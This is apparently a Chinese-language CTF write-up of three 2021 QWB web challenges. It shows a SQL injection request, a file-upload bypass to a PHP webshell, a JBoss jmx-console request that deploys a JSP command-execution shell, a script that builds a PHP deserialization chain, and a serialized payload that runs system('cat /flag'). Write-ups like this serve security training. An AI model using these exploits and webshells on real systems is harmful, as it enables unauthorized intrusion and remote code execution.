EASYWEB

控制台查看网络请求发现flies

访问47.104.137.239/files/c09358adff2ebfff2ef9b4fbacc4ac0b 下载hint.txt 拿到提示

Try to scan 35000-40000 ^_^.
All tables are empty except for the table where the username and password are located
Table: employee

根据提示通过端口扫描发现36842端口开放


username存在sql注入

POST /account/login HTTP/1.1
Host: 47.104.137.239:36842
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
DNT: 1
Connection: close
Referer: http://121.42.242.238:36842/account/login
Cookie: ci_session=bo397pc9n0pd318uetdbl1r5rh33u3jb
Upgrade-Insecure-Requests: 1

username=admin*&password=admin

拿到登陆账号密码
admin 99f609527226e076d668668582ac4420
登陆后台
后台没有可以利用的地方

继续扫描目录发现文件上传路由

构造文件名绕过限制上传php文件

由于权限太低无法getflag (只有owner有权限 flag权限应该是0440) 需要root用户组
继续查看监听端口发现有其他服务

通过上传的小马写入新的phpshell
通过shell搭建隧道访问web服务

发现是一个存在jmx-console未授权访问的jboss

/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell1&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%25 if("023".equals(request.getParameter("pwd"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%25>&argType=boolean&arg4=True

写入一句话shell

成功getflag

pop_master

该题需要构造反序列化利用链最终实现RCE
由于该题目类数量巨大1W个编写自动化脚本构造pop链

第一步将class.php.txt转化成AST(抽象语法树) 保存为json格式
<?php
ini_set(“memory_limit”,”-1”);
echo(json_encode(ast\parse_file(“class.php”, $version=70)));
构造比较简单A->B->C->…….->包含EVAL()的class function

调用这里有几个坑 1.调用途中有参数污染(附加垃圾数据) 2.调用途中传参可能被清空 (传参被赋值未定义的变量)3.调用途中传参可能被修改 (直接赋值为垃圾数据)
所以并不是找到调用链就可以完成工作而是需要找到可以利用的调用链

自动化代码:
PS:没有什么参考价值只对该题可用因为固定3种函数结构所以偷懒把参数写死了初学py语言第一次做AST树解析用这种笨方法)

## -*- coding: utf-8 -*-
import json
import random
import os
import string
with open("12.json") as f:
    line=f.readline()
    result=json.loads(line)
print(len(result['children']))
def asb(name,s,s1=''):
    ee = 0
    for a in result['children']:
        for b in a['children']['stmts']['children']:
            if 'name' in b['children'].keys():
                if (b['children']['name'] == 'gG1T5D'):
                    ee = 0
                    #ee=1
                if (b['children']['name'] == name):
                    test(a)
                    if(len(b['children']['stmts']['children'])==3):
                        q = b['children']['stmts']['children'][1]['children'][0]['children']['cond']['children']['args']['children'][1]
                        w = b['children']['stmts']['children'][random.randint(1,2)]['children'][0]['children']['cond']['children']['args']['children'][1]#随机分支 玄学构造
                        #print(s + q)
                        #print(s + w)
                        ran_str = ''.join(random.sample(string.ascii_letters, 8))
                        print('$'+ran_str+'=new '+a['children']['name']+'();')
                        s11='$' + ran_str + '->' + a['children']['stmts']['children'][0]['children']['props']['children'][0]['children']['name'] + '='
                        #if s1!='':

                        # asb(w, s +w+'-->')
                        # asb(q, s +q+'-->')
                        if ee!=1:
                            asb(w,s,s11)# 分支函数1
                            #asb(q, s, s11)# 分支函数2
                            if ran_str == '':
                                exit()
                            print(s1 + '$' + ran_str+';')


                        #asb(q, s +q+'-->')

                    else:
                        if 'method' in b['children']['stmts']['children'][1]['children'].keys():# 没有分支
                            q = b['children']['stmts']['children'][1]['children']['method']
                            ran_str = ''.join(random.sample(string.ascii_letters, 8))
                            print('$' + ran_str + '=new ' + a['children']['name'] + '();')
                            s11 = '$' + ran_str + '->' + a['children']['stmts']['children'][0]['children']['props']['children'][0]['children']['name'] + '='
                            #print(s + q)
                            if ee != 1:
                                asb(q, s, s11)
                                if ran_str == '':
                                    exit()
                                print(s1 + '$' + ran_str + ';')


def test(d):
    #if name in {'Name','COiLxB'}:
       #print('nono')
        #exit()
    try:
        a=d['children']['stmts']['children'][1]['children']['params']['children'][0]['children']['name']
        b=d['children']['stmts']['children'][1]['children']['stmts']['children'][0]['children']['stmts']['children'][0]['children']['var']['children']['name']
        c=d['children']['stmts']['children'][1]['children']['stmts']['children'][0]['children']['stmts']['children'][0]['children']['expr']['children']['name']
        if(a==b and b!=c and a!='DgiNa'): #判断赋值是否是用不存在的变量覆盖传参

            print(a,b,c)
            print('no')
            asb('YYdqkf', 'YYdqkf' + '-->')#重新搜索
            os._exit(0)

    except:
        pass
asb('YYdqkf','YYdqkf'+'-->')

编写脚本处理AST
随机抽取一条构造链检验是否正常执行(传参修改检测) 反复抽取得到可用的链

ps:例图输出与下面代码无关找不到成功的图了

<?php
此处省略3M大小的源class
$a=new WK4tcG();
$prXsQMfO=new WK4tcG();
$DLcTtAga=new xaeGnG();
$lcbgRpGI=new oAMzcx();
$IatldcbW=new p38LCI();
$nULgbaKw=new GbfW4c();
$ASyQaYMV=new m2s3zO();
$GMwztlCS=new PgSSqR();
$MegPsOnX=new RLuIRL();
$neJOwgfu=new WykBAC();
$PNHChDce=new g6hgDh();
$BzceWjKp=new HDaeRV();
$YThMXwcb=new bREm3w();
$xWVjhwmO=new D0aZh5();
$BIbCvgZD=new T9NX4U();
$prvhXPMW=new eWciOL();
$NVHbgdzD=new TqWDlm();
$mszgihWC=new XoFA87();
$vDBkPwqO=new MU1ai5();
$ZYHhsIid=new eHtdBF();
$ZYHhsIid->V7XKdgi=new DNUWgV();
$vDBkPwqO->zXEmp6T=$ZYHhsIid;
$mszgihWC->z35pfqP=$vDBkPwqO;
$NVHbgdzD->KGgGFnb=$mszgihWC;
$prvhXPMW->D6qeYVK=$NVHbgdzD;
$BIbCvgZD->UwQCEH2=$prvhXPMW;
$xWVjhwmO->ST8sCZq=$BIbCvgZD;
$YThMXwcb->pMgtiwK=$xWVjhwmO;
$BzceWjKp->OO72gIu=$YThMXwcb;
$PNHChDce->GYBlHLq=$BzceWjKp;
$neJOwgfu->yWYNYcP=$PNHChDce;
$MegPsOnX->dFy0Irz=$neJOwgfu;
$GMwztlCS->Cs99EPC=$MegPsOnX;
$ASyQaYMV->QidIkAq=$GMwztlCS;
$nULgbaKw->gE4DrP9=$ASyQaYMV;
$IatldcbW->OksedLV=$nULgbaKw;
$lcbgRpGI->SUxaKsh=$IatldcbW;
$DLcTtAga->u3832FP=$lcbgRpGI;
$a->fBuH5Og=$DLcTtAga;
//$a = $_GET['pop'];
$b = $_GET['argv'];
echo serialize($a);
//$a = unserialize($a);
//var_dump($a);
$a->YYdqkf($b);
?>

生成序列化文本
?pop=O:6:%22WK4tcG%22:1:{s:7:%22fBuH5Og%22;O:6:%22xaeGnG%22:1:{s:7:%22u3832FP%22;O:6:%22oAMzcx%22:1:{s:7:%22SUxaKsh%22;O:6:%22p38LCI%22:1:{s:7:%22OksedLV%22;O:6:%22GbfW4c%22:1:{s:7:%22gE4DrP9%22;O:6:%22m2s3zO%22:1:{s:7:%22QidIkAq%22;O:6:%22PgSSqR%22:1:{s:7:%22Cs99EPC%22;O:6:%22RLuIRL%22:1:{s:7:%22dFy0Irz%22;O:6:%22WykBAC%22:1:{s:7:%22yWYNYcP%22;O:6:%22g6hgDh%22:1:{s:7:%22GYBlHLq%22;O:6:%22HDaeRV%22:1:{s:7:%22OO72gIu%22;O:6:%22bREm3w%22:1:{s:7:%22pMgtiwK%22;O:6:%22D0aZh5%22:1:{s:7:%22ST8sCZq%22;O:6:%22T9NX4U%22:1:{s:7:%22UwQCEH2%22;O:6:%22eWciOL%22:1:{s:7:%22D6qeYVK%22;O:6:%22TqWDlm%22:1:{s:7:%22KGgGFnb%22;O:6:%22XoFA87%22:1:{s:7:%22z35pfqP%22;O:6:%22MU1ai5%22:1:{s:7:%22zXEmp6T%22;O:6:%22eHtdBF%22:1:{s:7:%22V7XKdgi%22;O:6:%22DNUWgV%22:1:{s:7:%22bieiHE3%22;N;}}}}}}}}}}}}}}}}}}}}&argv=system(%27cat%20/flag%27);//
访问即可getflag

[强网先锋]寻宝

需要两个KEY 来getflag

KEY1

 <?php
header('Content-type:text/html;charset=utf-8');
highlight_file(__file__);


function filter($string){
        $filter_word = array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000');
        $filter_phrase= '/'.implode('|',$filter_word).'/';
        return preg_replace($filter_phrase,'',$string);
    }


if($ppp){
    unset($ppp);
}
$ppp['number1'] = "1";
$ppp['number2'] = "1";
$ppp['nunber3'] = "1";
$ppp['number4'] = '1';
$ppp['number5'] = '1';

extract($_POST);

$num1 = filter($ppp['number1']);        
$num2 = filter($ppp['number2']);        
$num3 = filter($ppp['number3']);        
$num4 = filter($ppp['number4']);
$num5 = filter($ppp['number5']);    


if(isset($num1) && is_numeric($num1)){
    die("非数字");
}

else{
  
    if($num1 > 1024){
    echo "第一层";
        if(isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000){
            echo "第二层";
            if(isset($num3) && '4bf21cd' === substr(md5($num3),0,7)){
                echo "第三层";
                if(!($num4 < 0)&&($num4 == 0)&&($num4 <= 0)&&(strlen($num4) > 6)&&(strlen($num4) < 8)&&isset($num4) ){
                    echo "第四层";
                    if(!isset($num5)||(strlen($num5)==0)) die("no");
                    $b=json_decode(@$num5);
                        if($y = $b === NULL){
                                if($y === true){
                                    echo "第五层";
                                    include 'KeY1lhv.php';
                                    echo $KEY1;
                                }
                        }else{
                            die("no");
                        }
                }else{
                    die("no");
                }
            }else{
                die("no");
            }
        }else{
            die("no");
        }
    }else{
        die("no111");
    }
}

number1 number2使用科学计数法
number3 md5前缀碰撞
number4 带负号的0值绕过
number5 json {1}即为true

成功拿到KEY1

Key2

下载文件

压缩包内有大量docx文件
编写脚本提取docx正文文本寻找带有KEY的文本

找到KEY2
KEY1 KEY2提交到网站成功getflag

PHP代码审计入门基础-PHP敏感函数速查表

2021年春秋杯网络安全联赛春季赛-CTF-GameContract-WriteUp

本文作者：白帽酱

永久链接：https://rce.moe/2021/06/14/QWB-2021-WEB-WP/